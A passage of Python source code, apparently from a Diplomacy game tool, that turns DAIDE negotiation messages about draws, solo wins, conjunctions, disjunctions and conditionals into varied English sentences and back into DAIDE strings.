                # (REJ (PRP (NOT (DRW
                elif self.container.container.container.operator == 'REJ':
                    if self.powers is None:
                        self.english = 'I ' + random.choice(['still think', 'nevertheless believe']) + ' we should pursue a draw.'
                    else:
                        self.english = 'I ' + random.choice(['still think', 'nevertheless believe']) + ' we should pursue a draw between ' + powersgloss + '.'
                # (CCL (PRP (NOT (DRW
                elif self.container.container.container.operator == 'CCL':
                    if self.powers is None:
                        self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my proposal that we do not draw.'
                    else:
                        self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my proposal that ' + subjpowersgloss + ' not pursue a draw.'
                # (HUH (PRP (NOT (DRW
                elif self.container.container.container.operator == 'HUH':
                    self.english = 'I do not understand your proposal about a draw.'
            elif self.container.container.operator == 'FCT':
                # (FCT (NOT (DRW
                if self.container.container.container is None:
                    if self.powers is None:
                        self.english = 'I am not pursuing a draw.'
                    else:
                        self.english = subjpowersgloss + ' are not pursuing a draw.'
                # (HUH (FCT (NOT (DRW
                elif self.container.container.container.operator == 'HUH':
                    self.english = 'I do not understand your statement about a draw.'
        elif self.container.operator == 'NAR':
            if self.container.container.operator == 'PRP':
                # (PRP (NAR (DRW
                if self.container.container.container is None:
                    if self.powers is None:
                        self.english = 'It is ' + random.choice(['unclear', 'fuzzy', 'uncertain']) + ' that we should pursue a draw.'
                    else:
                        self.english = 'It is ' + random.choice(['unclear', 'fuzzy', 'uncertain']) + ' that ' + subjpowersgloss + ' should pursue a draw.'
                # (YES (PRP (NAR (DRW
                elif self.container.container.container.operator == 'YES':
                    if self.powers is None:
                        self.english = 'I ' + random.choice(['agree', 'concur']) + ' that it is ' + random.choice(['unclear', 'fuzzy', 'uncertain']) + ' that we should pursue a draw.'
                    else:
                        self.english = 'I ' + random.choice(['agree', 'concur']) + ' that it is ' + random.choice(['unclear', 'fuzzy', 'uncertain']) + ' that ' + subjpowersgloss + ' should pursue a draw.'
                # (REJ (PRP (NAR (DRW
                elif self.container.container.container.operator == 'REJ':
                    if self.powers is None:
                        self.english = 'No, I ' + random.choice(['think', 'believe']) + ' that we should pursue a draw.'
                    else:
                        self.english = 'No, I ' + random.choice(['think', 'believe']) + ' that ' + subjpowersgloss + ' should pursue a draw.'
                # (CCL (PRP (NAR (DRW
                elif self.container.container.container.operator == 'CCL':
                    if self.powers is None:
                        self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my proposal regarding a draw.'
                    else:
                        self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my proposal regarding a draw between ' + powersgloss + '.'
                # (HUH (PRP (NAR (DRW
                elif self.container.container.container.operator == 'HUH':
                    self.english = 'I do not understand your proposal about a draw.'
            elif self.container.container.operator == 'FCT':
                # (FCT (NAR (DRW
                if self.container.container.container is None:
                    if self.powers is None:
                        self.english = 'It is unclear if we are in a good draw position.'
                    else:
                        self.english = 'It is unclear if ' + subjpowersgloss + ' are in a good draw position.'
                # (HUH (FCT (NAR (DRW
                elif self.container.container.container.operator == 'HUH':
                    self.english = 'I do not understand your statement about a draw.'
        elif self.container.operator == 'FCT':
            # (FCT (DRW
            if self.container.container is None:
                if self.powers is None:
                    self.english = 'We are in a good draw position.'
                else:
                    self.english = subjpowersgloss + ' are in a good draw position.'
            # (HUH (FCT (DRW
            elif self.container.container.operator == 'HUH':
                self.english = 'I do not understand your statement about a draw.'
        else:
            # No recognized wrapper: fall back to the plain statement.
            self.english = self.formsimpleenglish()
        return self.english
    def formsimpleenglish(self): # type: () -> str
        """
        Creates a simple English expression about the draw, without any context like proposals, negations, etc.
        :return: the simple English expression
        :rtype: str
        """
        if self.powers is None:
            self.simpleenglish = 'a draw'
        else:
            self.simpleenglish = 'a draw between ' + helpers.listOfPowers(self.powers, self.utterance.frompower, self.utterance.topowers)
        return self.simpleenglish
    def formDAIDE(self): # type: () -> str
        """
        Create a DAIDE representation of this Message
        :return: the DAIDE message, 'DRW' or 'DRW (ENG FRA)'
        :rtype: str
        """
        if self.powers is None:
            return 'DRW'
        else:
            return 'DRW (' + ' '.join(self.powers) + ')'
class PressSolo(PressMessage):
    """ The game-related content of a solo win. """
    def __init__(self, utterance, container, thelists): # type: (PressUtterance, PressMessage, []) -> None
        """
        Initialize the message with an utterance
        :param utterance: the press utterance that this message is within the content for
        :type utterance: PressUtterance
        :param container: the press message that contains this one
        :type container: PressMessage
        :param thelists: the parsed, nested DAIDE statement
        :type thelists: []
        """
        super().__init__(utterance, container)
        if thelists is None or len(thelists) == 0:
            # No parsed DAIDE supplied: invent a random solo-win claim.
            self.operator = 'SLO'
            if random.choice([True, True, False]):
                # Bias (2-in-3) toward claiming the sender's own solo win.
                self.winner = [utterance.frompower]
            else:
                self.winner = [random.choice(helpers.powerlist)]
        elif len(thelists) == 2:
            # Parsed form: ['SLO', [winner]]
            self.operator = thelists[0]
            self.winner = thelists[1]
    def formenglish(self): # type: () -> str
        """
        Creates an English expression about the solo win in the context of a sender, recipients and desired tone.
        The wording is chosen from the chain of containing operators (PRP/NOT/NAR/FCT, wrapped by YES/REJ/CCL/HUH).
        :return: the English expression
        :rtype: str
        """
        winnergloss = helpers.listOfPowers(self.winner, self.utterance.frompower, self.utterance.topowers)
        if self.container.operator == 'PRP':
            # (PRP (SLO
            if self.container.container is None:
                if winnergloss == 'me':
                    self.english = 'I am ' + random.choice(['in a good position for a solo win', 'going for a solo win', 'not catchable - watch my solo win', 'just a matter of turns away from winning']) + '.'
                elif winnergloss == 'you':
                    self.english = 'You are ' + random.choice(['in a good position for a solo win', 'going for a solo win', 'not catchable - go for a solo win', 'just a matter of turns away from winning']) + '.'
                else:
                    self.english = winnergloss + ' is ' + random.choice(['in a good position for a solo win', 'going for a solo win', 'not catchable - going for a solo win', 'just a matter of turns away from winning']) + '.'
            # (YES (PRP (SLO
            elif self.container.container.operator == 'YES':
                self.english = 'I ' + random.choice(['agree to', 'concur with']) + ' the likelihood of a solo win by ' + winnergloss + '.'
            # (REJ (PRP (SLO
            elif self.container.container.operator == 'REJ':
                self.english = 'I ' + random.choice(['disagree with', 'reject']) + ' the likelihood of a solo win by ' + winnergloss + '.'
            # (CCL (PRP (SLO
            elif self.container.container.operator == 'CCL':
                self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my proposal of a solo win by ' + winnergloss + '.'
            # (HUH (PRP (SLO
            elif self.container.container.operator == 'HUH':
                self.english = 'I do not understand your solo win proposal.'
        elif self.container.operator == 'NOT':
            if self.container.container.operator == 'PRP':
                # (PRP (NOT (SLO
                if self.container.container.container is None:
                    if winnergloss == 'me':
                        self.english = 'I am ' + random.choice(['not in a good position for a solo win', 'not going for a solo win', 'not uncatchable - no solo win yet', 'still a ways from winning']) + '.'
                    elif winnergloss == 'you':
                        self.english = 'You are ' + random.choice(['not in a good position for a solo win', 'not going for a solo win', 'not uncatchable - no solo win yet', 'still a ways from winning']) + '.'
                    else:
                        self.english = winnergloss + ' is ' + random.choice(['not in a good position for a solo win', 'not going for a solo win', 'not uncatchable - no solo win yet', 'still a ways from winning']) + '.'
                # (YES (PRP (NOT (SLO
                elif self.container.container.container.operator == 'YES':
                    if winnergloss == 'me':
                        self.english = 'I agree I am ' + random.choice(['not in a good position for a solo win', 'not going for a solo win', 'not uncatchable - no solo win yet', 'still a ways from winning']) + '.'
                    elif winnergloss == 'you':
                        self.english = 'I agree you are ' + random.choice(['not in a good position for a solo win', 'not going for a solo win', 'not uncatchable - no solo win yet', 'still a ways from winning']) + '.'
                    else:
                        self.english = 'I agree ' + winnergloss + ' is ' + random.choice(['not in a good position for a solo win', 'not going for a solo win', 'not uncatchable - no solo win yet', 'still a ways from winning']) + '.'
                # (REJ (PRP (NOT (SLO
                elif self.container.container.container.operator == 'REJ':
                    if winnergloss == 'me':
                        self.english = 'I think I am ' + random.choice(['closer to a win than you think', 'going for a solo win anyway', 'nevertheless uncatchable', 'quite close to winning']) + '.'
                    elif winnergloss == 'you':
                        self.english = 'I think you are ' + random.choice(['closer to a win than you think', 'going for a solo win anyway', 'nevertheless uncatchable', 'quite close to winning']) + '.'
                    else:
                        self.english = 'I think ' + winnergloss + ' is ' + random.choice(['closer to a win than you think', 'going for a solo win anyway', 'nevertheless uncatchable', 'quite close to winning']) + '.'
                # (CCL (PRP (NOT (SLO
                elif self.container.container.container.operator == 'CCL':
                    self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my proposal that a solo win is not in the cards for ' + winnergloss + '.'
                # (HUH (PRP (NOT (SLO
                elif self.container.container.container.operator == 'HUH':
                    self.english = 'I do not understand your proposal about a solo win.'
            elif self.container.container.operator == 'FCT':
                # (FCT (NOT (SLO
                if self.container.container.container is None:
                    self.english = winnergloss + ' is not pursuing a solo win.'
                # (HUH (FCT (NOT (SLO
                elif self.container.container.container.operator == 'HUH':
                    self.english = 'I do not understand your statement about a solo win.'
        elif self.container.operator == 'NAR':
            if self.container.container.operator == 'PRP':
                # (PRP (NAR (SLO
                if self.container.container.container is None:
                    if winnergloss == 'me':
                        self.english = 'I am ' + random.choice(['unsure about a solo win', 'on the fence about a solo win', 'not uncatchable - no solo win yet', 'still a ways from winning']) + '.'
                    elif winnergloss == 'you':
                        self.english = 'You are ' + random.choice(['unsure about a solo win', 'on the fence about a solo win', 'not uncatchable - no solo win yet', 'still a ways from winning']) + '.'
                    else:
                        self.english = winnergloss + ' is ' + random.choice(['unsure about a solo win', 'on the fence about a solo win', 'not uncatchable - no solo win yet', 'still a ways from winning']) + '.'
                # (YES (PRP (NAR (SLO
                elif self.container.container.container.operator == 'YES':
                    if winnergloss == 'me':
                        self.english = 'I agree I am ' + random.choice(['unsure about a solo win', 'on the fence about a solo win', 'not uncatchable - no solo win yet', 'still a ways from winning']) + '.'
                    elif winnergloss == 'you':
                        self.english = 'I agree you are ' + random.choice(['unsure about a solo win', 'on the fence about a solo win', 'not uncatchable - no solo win yet', 'still a ways from winning']) + '.'
                    else:
                        self.english = 'I agree ' + winnergloss + ' is ' + random.choice(['unsure about a solo win', 'on the fence about a solo win', 'not uncatchable - no solo win yet', 'still a ways from winning']) + '.'
                # (REJ (PRP (NAR (SLO
                elif self.container.container.container.operator == 'REJ':
                    if winnergloss == 'me':
                        self.english = 'I disagree - I am ' + random.choice(['pretty sure about a solo win', 'close to a solo win', 'uncatchable - solo win not far away', 'just a few moves from winning']) + '.'
                    elif winnergloss == 'you':
                        self.english = 'I disagree - you are ' + random.choice(['pretty sure about a solo win', 'close to a solo win', 'uncatchable - solo win not far away', 'just a few moves from winning']) + '.'
                    else:
                        self.english = 'I disagree - ' + winnergloss + ' is ' + random.choice(['pretty sure for a solo win', 'close to a solo win', 'uncatchable - solo win not far away', 'just a few moves from winning']) + '.'
                # (CCL (PRP (NAR (SLO
                elif self.container.container.container.operator == 'CCL':
                    self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my proposal that ' + \
                                   winnergloss + ' is not clearly capable of a solo win.'
                # (HUH (PRP (NAR (SLO
                elif self.container.container.container.operator == 'HUH':
                    self.english = 'I do not understand your proposal about a solo win.'
            elif self.container.container.operator == 'FCT':
                # (FCT (NAR (SLO
                if self.container.container.container is None:
                    if winnergloss == 'me':
                        self.english = 'It is unclear if I am ' + random.choice(['pretty sure for a solo win', 'close to a solo win', 'uncatchable', 'just a few moves from winning']) + '.'
                    elif winnergloss == 'you':
                        # BUGFIX: corrected 'unlcear' typo in the rendered sentence.
                        self.english = 'It is unclear if you are ' + random.choice(['pretty sure for a solo win', 'close to a solo win', 'uncatchable', 'just a few moves from winning']) + '.'
                    else:
                        # BUGFIX: corrected 'I it is unlcear if' to 'It is unclear if'.
                        self.english = 'It is unclear if ' + winnergloss + ' is ' + random.choice(['pretty sure for a solo win', 'close to a solo win', 'uncatchable', 'just a few moves from winning']) + '.'
                # (HUH (FCT (NAR (SLO
                elif self.container.container.container.operator == 'HUH':
                    self.english = 'I do not understand your statement about a solo win.'
        elif self.container.operator == 'FCT':
            # (FCT (SLO
            if self.container.container is None:
                if winnergloss == 'me':
                    self.english = 'I am ' + random.choice(['pretty sure for a solo win', 'close to a solo win', 'uncatchable', 'just a few moves from winning']) + '.'
                elif winnergloss == 'you':
                    self.english = 'You are ' + random.choice(['pretty sure for a solo win', 'close to a solo win', 'uncatchable', 'just a few moves from winning']) + '.'
                else:
                    self.english = winnergloss + ' is ' + random.choice(['pretty sure for a solo win', 'close to a solo win', 'uncatchable', 'just a few moves from winning']) + '.'
            # (HUH (FCT (SLO
            elif self.container.container.operator == 'HUH':
                self.english = 'I do not understand your statement about a solo win.'
        else:
            # No recognized wrapper: fall back to the plain statement.
            self.english = self.formsimpleenglish()
        return self.english
    def formsimpleenglish(self): # type: () -> str
        """
        Creates a simple English expression about the solo win, without any context like proposals, negations, etc.
        :return: the simple English expression
        :rtype: str
        """
        self.simpleenglish = 'a solo win by ' + helpers.listOfPowers(self.winner, self.utterance.frompower, self.utterance.topowers)
        return self.simpleenglish
    def formDAIDE(self): # type: () -> str
        """
        Create a DAIDE representation of this Message
        :return: the DAIDE message, e.g. 'SLO (ENG)'; winner is a one-element list
        :rtype: str
        """
        return 'SLO (' + self.winner[0] + ')'
class PressAnd(PressMessage):
    """ The game-related content of a conjunction. """
    def __init__(self, utterance, container, thelists): # type: (PressUtterance, PressMessage, []) -> None
        """
        Initialize the message with an utterance
        :param utterance: the press utterance that this message is within the content for
        :type utterance: PressUtterance
        :param container: the press message that contains this one
        :type container: PressMessage
        :param thelists: the parsed, nested DAIDE statement
        :type thelists: []
        """
        super().__init__(utterance, container)
        self.conjuncts = []
        if thelists is None or len(thelists) == 0:
            # No parsed DAIDE supplied: invent a random conjunction of 2-4 sub-messages.
            self.operator = 'AND'
            for _ in range(random.randint(2, 4)):
                chosen = random.choice(['PCE', 'ALY', 'DMZ', 'SLO', 'DRW', 'XDO', 'NOT', 'NAR'])
                self.conjuncts.append(randomFactory(utterance, self, chosen))
        elif len(thelists) > 1:
            # Parsed form: ['AND', sub1, sub2, ...]
            self.operator = thelists[0]
            for sublist in thelists[1:]:
                self.conjuncts.append(messageFactory(utterance, self, sublist))
    def formenglish(self): # type: () -> str
        """
        Creates an English expression about the conjunction in the context of a sender, recipients and desired tone.
        :return: the English expression
        :rtype: str
        """
        outer = self.container
        if outer.operator == 'PRP':
            inner = outer.container
            # (PRP (AND
            if inner is None:
                verb = random.choice(['propose', 'request', 'offer'])
                self.english = 'I ' + verb + ' all of the following: ' + self.formsimpleenglish()
            # (YES (PRP (AND
            elif inner.operator == 'YES':
                verb = random.choice(['agree to', 'concur with', 'will accept'])
                self.english = 'I ' + verb + ' all of the following: ' + self.formsimpleenglish()
            # (REJ (PRP (AND
            elif inner.operator == 'REJ':
                verb = random.choice(['reject', 'do not concur with', 'do not approve of', 'do not accept'])
                self.english = 'I ' + verb + ' all of the following: ' + self.formsimpleenglish()
            # (CCL (PRP (AND
            elif inner.operator == 'CCL':
                verb = random.choice(['cancel', 'retract', 'take back'])
                self.english = 'I wish to ' + verb + ' my proposal of the following: ' + self.formsimpleenglish()
            # (HUH (PRP (AND
            elif inner.operator == 'HUH':
                self.english = 'I do not understand your list of proposals.'
        elif outer.operator == 'NOT':
            middle = outer.container
            if middle.operator == 'PRP':
                inner = middle.container
                # (PRP (NOT (AND
                if inner is None:
                    verb = random.choice(['want', 'desire', 'support'])
                    self.english = 'I do not ' + verb + ' the following: ' + self.formsimpleenglish()
                # (YES (PRP (NOT (AND
                elif inner.operator == 'YES':
                    verb = random.choice(['agree', 'concur'])
                    self.english = 'I ' + verb + ' that none of the following are desirable: ' + self.formsimpleenglish()
                # (REJ (PRP (NOT (AND
                elif inner.operator == 'REJ':
                    verb = random.choice(['disagree', 'reject'])
                    self.english = 'I ' + verb + ' that none of the following are desirable: ' + self.formsimpleenglish()
                # (CCL (PRP (NOT (AND
                elif inner.operator == 'CCL':
                    verb = random.choice(['cancel', 'retract', 'take back'])
                    self.english = 'I wish to ' + verb + ' my proposal rejecting the following: ' + self.formsimpleenglish()
                # (HUH (PRP (NOT (AND
                elif inner.operator == 'HUH':
                    self.english = 'I do not understand your list of proposals.'
            elif middle.operator == 'FCT':
                inner = middle.container
                # (FCT (NOT (AND
                if inner is None:
                    self.english = 'The following conditions are not true: ' + self.formsimpleenglish()
                # (HUH (FCT (NOT (AND
                elif inner.operator == 'HUH':
                    self.english = 'I do not understand your list of statements.'
        elif outer.operator == 'NAR':
            middle = outer.container
            if middle.operator == 'PRP':
                inner = middle.container
                # (PRP (NAR (AND
                if inner is None:
                    verb = random.choice(['am ambivalent about', 'am unsure about', 'am not convinced of'])
                    self.english = 'I ' + verb + ' the following: ' + self.formsimpleenglish()
                # (YES (PRP (NAR (AND
                elif inner.operator == 'YES':
                    verb = random.choice(['ambivalent about', 'unsure about', 'not convinced of'])
                    self.english = 'I am also ' + verb + ' the following: ' + self.formsimpleenglish()
                # (REJ (PRP (NAR (AND
                elif inner.operator == 'REJ':
                    verb = random.choice(['reject', 'oppose'])
                    self.english = 'No, I ' + verb + ' your ambivalence about: ' + self.formsimpleenglish()
                # (CCL (PRP (NAR (AND
                elif inner.operator == 'CCL':
                    verb = random.choice(['cancel', 'retract', 'take back'])
                    self.english = 'I wish to ' + verb + ' my ambivalence about the following: ' + self.formsimpleenglish()
                # (HUH (PRP (NAR (AND
                elif inner.operator == 'HUH':
                    self.english = 'I do not understand your list of proposals.'
            elif middle.operator == 'FCT':
                inner = middle.container
                # (FCT (NAR (AND
                if inner is None:
                    self.english = 'It is unclear if the following are true: ' + self.formsimpleenglish()
                # (HUH (FCT (NAR (AND
                elif inner.operator == 'HUH':
                    self.english = 'I do not understand your list of statements.'
        elif outer.operator == 'FCT':
            inner = outer.container
            # (FCT (AND
            if inner is None:
                self.english = 'The following are all true: ' + self.formsimpleenglish()
            # (HUH (FCT (AND
            elif inner.operator == 'HUH':
                self.english = 'I do not understand your list of statements.'
        else:
            self.english = self.formsimpleenglish()
        return self.english
    def formsimpleenglish(self): # type: () -> str
        """
        Creates an English expression about the conjunction in the context of a sender, recipients and desired tone.
        :return: the English expression (an HTML bullet list of the conjuncts)
        :rtype: str
        """
        items = ['<li>' + helpers.initcap(member.formsimpleenglish()) + '</li>' for member in self.conjuncts]
        self.simpleenglish = '<br><ul>' + ''.join(items) + '</ul>'
        return self.simpleenglish
    def formDAIDE(self): # type: () -> str
        """
        Create a DAIDE representation of this Message
        :return: the DAIDE message, e.g. 'AND (sub1) (sub2)'
        :rtype: str
        """
        wrapped = ['(' + member.formDAIDE() + ')' for member in self.conjuncts]
        return 'AND ' + ' '.join(wrapped)
class PressOr(PressMessage):
    """ The game-related content of a disjunction (DAIDE ORR). """
    def __init__(self, utterance, container, thelists):  # type: (PressUtterance, PressMessage, []) -> None
        """
        Initialize the message with an utterance
        :param utterance: the press utterance that this message is within the content for
        :type utterance: PressUtterance
        :param container: the press message that contains this one
        :type container: PressMessage
        :param thelists: the parsed, nested DAIDE statement
        :type thelists: []
        """
        super().__init__(utterance, container)
        self.disjuncts = []
        if thelists is None or len(thelists) == 0:
            # No parse supplied: fabricate a random disjunction of 2-4 sub-messages.
            # BUGFIX: was 'AND' (copy-paste from the conjunction class); this class
            # models a DAIDE ORR and formDAIDE() emits 'ORR' for it, and other code
            # dispatches on container operators, so the operator must agree.
            self.operator = 'ORR'
            for _ in range(0, random.randint(2, 4)):
                disjword = random.choice(['PCE', 'ALY', 'DMZ', 'SLO', 'DRW', 'XDO', 'NOT', 'NAR'])
                self.disjuncts.append(randomFactory(utterance, self, disjword))
        elif len(thelists) > 1:
            # Parsed form: ('ORR', <disjunct>, <disjunct>, ...)
            self.operator = thelists[0]
            for cDisj in range(1, len(thelists)):
                self.disjuncts.append(messageFactory(utterance, self, thelists[cDisj]))
    def formenglish(self):  # type () -> str
        """
        Creates an English expression about the disjunction in the context of a sender, recipients and desired tone.
        Wording is chosen by inspecting the chain of enclosing operators
        (PRP/NOT/NAR/FCT, optionally wrapped in a YES/REJ/CCL/HUH reply).
        :return: the English expression
        :rtype: str
        """
        if self.container.operator == 'PRP':
            # (PRP (ORR
            if self.container.container is None:
                self.english = 'I ' + random.choice(['propose', 'request', 'offer']) + \
                               ' that you choose one of the following options: ' + self.formsimpleenglish()
            # (YES (PRP (ORR
            elif self.container.container.operator == 'YES':
                self.english = 'I ' + random.choice(['agree to', 'concur with', 'will accept']) + ' one of the following: ' + self.formsimpleenglish()
            # (REJ (PRP (ORR
            elif self.container.container.operator == 'REJ':
                self.english = 'I ' + random.choice(['reject', 'do not concur with', 'do not approve of', 'do not accept']) + \
                               ' any of the following: ' + self.formsimpleenglish()
            # (CCL (PRP (ORR
            elif self.container.container.operator == 'CCL':
                self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my proposal of a choice from the following: ' + self.formsimpleenglish()
            # (HUH (PRP (ORR
            elif self.container.container.operator == 'HUH':
                self.english = 'I do not understand your list of proposals.'
        elif self.container.operator == 'NOT':
            if self.container.container.operator == 'PRP':
                # (PRP (NOT (ORR
                if self.container.container.container is None:
                    self.english = 'I do not ' + random.choice(['want', 'desire', 'support']) + ' any of the following: ' + self.formsimpleenglish()
                # (YES (PRP (NOT (ORR
                elif self.container.container.container.operator == 'YES':
                    self.english = 'I ' + random.choice(['agree', 'concur']) + ' that none of the following are desirable: ' + self.formsimpleenglish()
                # (REJ (PRP (NOT (ORR
                elif self.container.container.container.operator == 'REJ':
                    self.english = 'I ' + random.choice(['disagree', 'reject']) + ' that none of the following are desirable: ' + self.formsimpleenglish()
                # (CCL (PRP (NOT (ORR
                elif self.container.container.container.operator == 'CCL':
                    self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my proposal rejecting the following: ' + self.formsimpleenglish()
                # (HUH (PRP (NOT (ORR
                elif self.container.container.container.operator == 'HUH':
                    self.english = 'I do not understand your list of proposals.'
            elif self.container.container.operator == 'FCT':
                # (FCT (NOT (ORR
                # NOTE(review): NOT(ORR ...) logically means none of the disjuncts
                # hold; the phrasing below says "one ... not true" - confirm intent.
                if self.container.container.container is None:
                    self.english = 'One of the following conditions are not true: ' + self.formsimpleenglish()
                # (HUH (FCT (NOT (ORR
                elif self.container.container.container.operator == 'HUH':
                    self.english = 'I do not understand your list of statements.'
        elif self.container.operator == 'NAR':
            if self.container.container.operator == 'PRP':
                # (PRP (NAR (ORR
                if self.container.container.container is None:
                    self.english = 'I ' + random.choice(['am ambivalent about', 'am unsure about', 'am not convinced of']) + ' one of the following: ' + self.formsimpleenglish()
                # (YES (PRP (NAR (ORR
                elif self.container.container.container.operator == 'YES':
                    # BUGFIX: was "one the following" (missing "of").
                    self.english = 'I am also ' + random.choice(['ambivalent about', 'unsure about', 'not convinced of']) + ' one of the following: ' + self.formsimpleenglish()
                # (REJ (PRP (NAR (ORR
                elif self.container.container.container.operator == 'REJ':
                    self.english = 'No, I ' + random.choice(['reject', 'oppose']) + ' your ambivalence about any of the following: ' + self.formsimpleenglish()
                # (CCL (PRP (NAR (ORR
                elif self.container.container.container.operator == 'CCL':
                    self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my ambivalence about one of the following: ' + self.formsimpleenglish()
                # (HUH (PRP (NAR (ORR
                elif self.container.container.container.operator == 'HUH':
                    self.english = 'I do not understand your list of proposals.'
            elif self.container.container.operator == 'FCT':
                # (FCT (NAR (ORR
                if self.container.container.container is None:
                    self.english = 'It is unclear if each of the following are true: ' + self.formsimpleenglish()
                # (HUH (FCT (NAR (ORR
                elif self.container.container.container.operator == 'HUH':
                    self.english = 'I do not understand your list of statements.'
        elif self.container.operator == 'FCT':
            # (FCT (ORR
            if self.container.container is None:
                self.english = 'One of the following is true: ' + self.formsimpleenglish()
            # (HUH (FCT (ORR
            elif self.container.container.operator == 'HUH':
                self.english = 'I do not understand your list of statements.'
        else:
            self.english = self.formsimpleenglish()
        return self.english
    def formsimpleenglish(self):  # type () -> str
        """
        Creates an English expression about the disjunction in the context of a sender, recipients and desired tone.
        Renders each disjunct as one bullet of an HTML unordered list.
        :return: the English expression
        :rtype: str
        """
        self.simpleenglish = '<br><ul>'
        for curDisj in self.disjuncts:
            self.simpleenglish += '<li>' + helpers.initcap(curDisj.formsimpleenglish()) + '</li>'
        self.simpleenglish += '</ul>'
        return self.simpleenglish
    def formDAIDE(self):  # type () -> str
        """
        Create a DAIDE representation of this Message
        :return: the DAIDE message
        :rtype: str
        """
        return 'ORR ' + ' '.join(['(' + curdisj.formDAIDE() + ')' for curdisj in self.disjuncts])
class PressIf(PressMessage):
    """ The game-related content of a conditional (DAIDE IFF, optional ELS alternative). """
    def __init__(self, utterance, container, thelists):  # type: (PressUtterance, PressMessage, []) -> None
        """
        Initialize the message with an utterance
        :param utterance: the press utterance that this message is within the content for
        :type utterance: PressUtterance
        :param container: the press message that contains this one
        :type container: PressMessage
        :param thelists: the parsed, nested DAIDE statement
        :type thelists: []
        """
        super().__init__(utterance, container)
        if thelists is None or len(thelists) == 0:
            # No parse supplied: fabricate a random conditional, with an optional
            # alternative half the time.
            # BUGFIX: was 'AND' (copy-paste); this class models a DAIDE IFF and
            # formDAIDE() emits 'IFF' for it, so the operator must agree.
            self.operator = 'IFF'
            anteword = random.choice(['PCE', 'ALY', 'DMZ', 'SLO', 'DRW', 'XDO', 'NOT', 'NAR'])
            self.antecedent = randomFactory(utterance, self, anteword)
            consword = random.choice(['PCE', 'ALY', 'DMZ', 'SLO', 'DRW', 'XDO', 'NOT', 'NAR'])
            self.consequent = randomFactory(utterance, self, consword)
            self.alternative = None
            if random.choice([True, False]):
                altword = random.choice(['PCE', 'ALY', 'DMZ', 'SLO', 'DRW', 'XDO', 'NOT', 'NAR'])
                self.alternative = randomFactory(utterance, self, altword)
        elif len(thelists) == 3:
            # Parsed form without alternative: (op, antecedent, consequent)
            self.operator = thelists[0]
            self.antecedent = messageFactory(utterance, self, thelists[1])
            self.consequent = messageFactory(utterance, self, thelists[2])
            self.alternative = None
        elif len(thelists) == 5:
            # Parsed form with alternative: thelists[3] is the 'ELS' token.
            self.operator = thelists[0]
            self.antecedent = messageFactory(utterance, self, thelists[1])
            self.consequent = messageFactory(utterance, self, thelists[2])
            self.alternative = messageFactory(utterance, self, thelists[4])
    def formenglish(self):  # type () -> str
        """
        Creates an English expression about the conditional in the context of a sender, recipients and desired tone.
        Wording is chosen by inspecting the chain of enclosing operators
        (PRP/NOT/NAR/FCT, optionally wrapped in a YES/REJ/CCL/HUH reply).
        :return: the English expression
        :rtype: str
        """
        if self.container.operator == 'PRP':
            # (PRP (IFF
            if self.container.container is None:
                if random.choice([True, False]):
                    self.english = 'Here\'s my ' + random.choice(['proposal', 'proposed deal', 'offer']) + \
                                   ': if ' + self.antecedent.formsimpleenglish() + ', then ' + self.consequent.formsimpleenglish() + '.'
                else:
                    self.english = 'Would you consider ' + self.consequent.formsimpleenglish() + ' if ' + self.antecedent.formsimpleenglish() + '?'
                if self.alternative is not None:
                    # BUGFIX: was self.antecedent; the fallback offer is the alternative.
                    self.english += ' If not this, then perhaps ' + self.alternative.formsimpleenglish() + '?'
            # (YES (PRP (IFF
            elif self.container.container.operator == 'YES':
                self.english = 'I ' + random.choice(['agree to', 'concur with', 'will accept']) + ' ' + self.antecedent.formsimpleenglish() + \
                               ' and when it\'s done, I will execute the following: ' + self.consequent.formsimpleenglish()
            # (REJ (PRP (IFF
            elif self.container.container.operator == 'REJ':
                self.english = 'I ' + random.choice(['reject', 'do not concur with', 'do not approve of', 'do not accept']) + \
                               ' the condition that ' + self.antecedent.formsimpleenglish() + ' should lead to ' + self.consequent.formsimpleenglish()
            # (CCL (PRP (IFF
            elif self.container.container.operator == 'CCL':
                self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my proposal of ' + \
                               self.antecedent.formsimpleenglish() + ' for ' + self.consequent.formsimpleenglish()
            # (HUH (PRP (IFF
            elif self.container.container.operator == 'HUH':
                self.english = 'I do not understand your quid pro quo.'
        elif self.container.operator == 'NOT':
            if self.container.container.operator == 'PRP':
                # (PRP (NOT (IFF
                if self.container.container.container is None:
                    self.english = 'I do not ' + random.choice(['want', 'desire', 'support']) + ' the following trade: ' + \
                                   self.antecedent.formsimpleenglish() + ' for ' + self.consequent.formsimpleenglish()
                # (YES (PRP (NOT (IFF
                elif self.container.container.container.operator == 'YES':
                    self.english = 'I ' + random.choice(['agree', 'concur']) + ' that the following trade is not desirable: ' + \
                                   self.antecedent.formsimpleenglish() + ' for ' + self.consequent.formsimpleenglish()
                # (REJ (PRP (NOT (IFF
                elif self.container.container.container.operator == 'REJ':
                    self.english = 'I still want ' + self.consequent.formsimpleenglish() + ' whether or not you want ' + self.antecedent.formsimpleenglish()
                # (CCL (PRP (NOT (IFF
                elif self.container.container.container.operator == 'CCL':
                    self.english = 'I wish to ' + random.choice(['cancel', 'retract', 'take back']) + ' my proposal rejecting ' + \
                                   self.antecedent.formsimpleenglish() + ' for ' + self.consequent.formsimpleenglish()
                # (HUH (PRP (NOT (IFF
                elif self.container.container.container.operator == 'HUH':
                    self.english = 'I do not understand your trade offer.'
            elif self.container.container.operator == 'FCT':
                # (FCT (NOT (IFF
                if self.container.container.container is None:
                    self.english = 'It is not the case that if ' + self.antecedent.formsimpleenglish() + ', then ' + self.consequent.formsimpleenglish()
                # (HUH (FCT (NOT (IFF
                elif self.container.container.container.operator == 'HUH':
                    self.english = 'I do not understand your statement about the trade.'
        elif self.container.operator == 'NAR':
            if self.container.container.operator == 'PRP':
                # (PRP (NAR (IFF
                if self.container.container.container is None:
